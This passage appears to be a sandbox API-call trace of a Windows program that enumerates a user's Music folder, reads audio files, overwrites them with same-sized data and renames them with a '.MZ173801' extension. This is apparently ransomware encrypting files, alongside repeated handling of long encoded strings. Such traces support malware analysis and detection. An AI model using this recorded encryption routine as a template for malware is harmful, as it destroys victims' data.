lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.046] GetCurrentThreadId () returned 0x1358 [0117.046] GetCurrentThreadId () returned 0x1358 [0117.046] GetCurrentThreadId () returned 0x1358 [0117.046] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.046] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.048] GetCurrentThreadId () returned 0x1358 [0117.048] GetCurrentThreadId () returned 0x1358 [0117.048] GetCurrentThreadId () returned 0x1358 [0117.048] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\Q005Y62fvMbMZrM r-4F.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\q005y62fvmbmzrm r-4f.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0117.049] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0117.049] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0117.049] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x5bb0 [0117.049] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0117.049] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x5bb0, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x5bb0, lpOverlapped=0x0) returned 1 [0117.050] CloseHandle (hObject=0x3d0) returned 1 [0117.050] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\Q005Y62fvMbMZrM r-4F.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\q005y62fvmbmzrm r-4f.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0117.051] WriteFile (in: hFile=0x3d0, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x5bb0, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f6f0*=0x5bb0, lpOverlapped=0x0) returned 1 [0117.052] CloseHandle (hObject=0x3d0) returned 1 [0117.056] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\Q005Y62fvMbMZrM r-4F.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\q005y62fvmbmzrm r-4f.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\Q005Y62fvMbMZrM r-4F.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\q005y62fvmbmzrm r-4f.wav.mz173801")) returned 1 [0117.058] GetCurrentThreadId () returned 0x1358 [0117.058] GetCurrentThreadId () returned 0x1358 [0117.058] GetCurrentThreadId () returned 0x1358 [0117.058] GetCurrentThreadId () returned 0x1358 [0117.058] GetCurrentThreadId () returned 0x1358 [0117.058] GetCurrentThreadId () returned 0x1358 [0117.058] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3eb563d0, ftCreationTime.dwHighDateTime=0x1d5f0a6, ftLastAccessTime.dwLowDateTime=0x3ed3930, ftLastAccessTime.dwHighDateTime=0x1d5ec1e, ftLastWriteTime.dwLowDateTime=0x3ed3930, ftLastWriteTime.dwHighDateTime=0x1d5ec1e, nFileSizeHigh=0x0, nFileSizeLow=0x5bb0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="Q005Y62fvMbMZrM r-4F.wav", cAlternateFileName="Q005Y6~1.WAV")) returned 0 [0117.058] GetLastError () returned 0x12 [0117.058] FindClose (in: hFindFile=0xa1be00 | out: hFindFile=0xa1be00) returned 1 [0117.058] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c22ad20, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xa70be136, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa70be136, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bab8 [0117.058] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0117.058] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0117.058] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c22ad20, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xa70be136, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa70be136, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0117.058] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0117.058] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0117.058] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31740de0, ftCreationTime.dwHighDateTime=0x1d5ed7a, ftLastAccessTime.dwLowDateTime=0x69838da0, ftLastAccessTime.dwHighDateTime=0x1d5e40b, ftLastWriteTime.dwLowDateTime=0x69838da0, ftLastWriteTime.dwHighDateTime=0x1d5e40b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="1Zion8xjlGTdeA8sDujv", cAlternateFileName="1ZION8~1")) returned 1 [0117.058] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0117.058] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0117.058] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\*.*", lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31740de0, ftCreationTime.dwHighDateTime=0x1d5ed7a, ftLastAccessTime.dwLowDateTime=0x69838da0, ftLastAccessTime.dwHighDateTime=0x1d5e40b, ftLastWriteTime.dwLowDateTime=0x69838da0, ftLastWriteTime.dwHighDateTime=0x1d5e40b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bbd0 [0117.058] FindNextFileW (in: hFindFile=0xa1bbd0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31740de0, ftCreationTime.dwHighDateTime=0x1d5ed7a, ftLastAccessTime.dwLowDateTime=0x69838da0, ftLastAccessTime.dwHighDateTime=0x1d5e40b, ftLastWriteTime.dwLowDateTime=0x69838da0, ftLastWriteTime.dwHighDateTime=0x1d5e40b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0117.059] FindNextFileW (in: hFindFile=0xa1bbd0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa106020, ftCreationTime.dwHighDateTime=0x1d5ef35, ftLastAccessTime.dwLowDateTime=0x6e281240, ftLastAccessTime.dwHighDateTime=0x1d5e154, ftLastWriteTime.dwLowDateTime=0x6e281240, ftLastWriteTime.dwHighDateTime=0x1d5e154, nFileSizeHigh=0x0, nFileSizeLow=0x3228, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="0VlS.mp3", cAlternateFileName="")) returned 1 [0117.059] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c8 | out: lpLocalFileTime=0x19f4c8) returned 1 [0117.059] FileTimeToDosDateTime (in: lpFileTime=0x19f4c8, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.059] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\0VlS.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\0vls.mp3"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa106020, ftCreationTime.dwHighDateTime=0x1d5ef35, ftLastAccessTime.dwLowDateTime=0x6e281240, ftLastAccessTime.dwHighDateTime=0x1d5e154, ftLastWriteTime.dwLowDateTime=0x6e281240, ftLastWriteTime.dwHighDateTime=0x1d5e154, nFileSizeHigh=0x0, nFileSizeLow=0x3228)) returned 1 [0117.059] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.059] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.059] GetCurrentThreadId () returned 0x1358 [0117.059] GetCurrentThreadId () returned 0x1358 [0117.059] GetCurrentThreadId () returned 0x1358 [0117.060] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.060] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 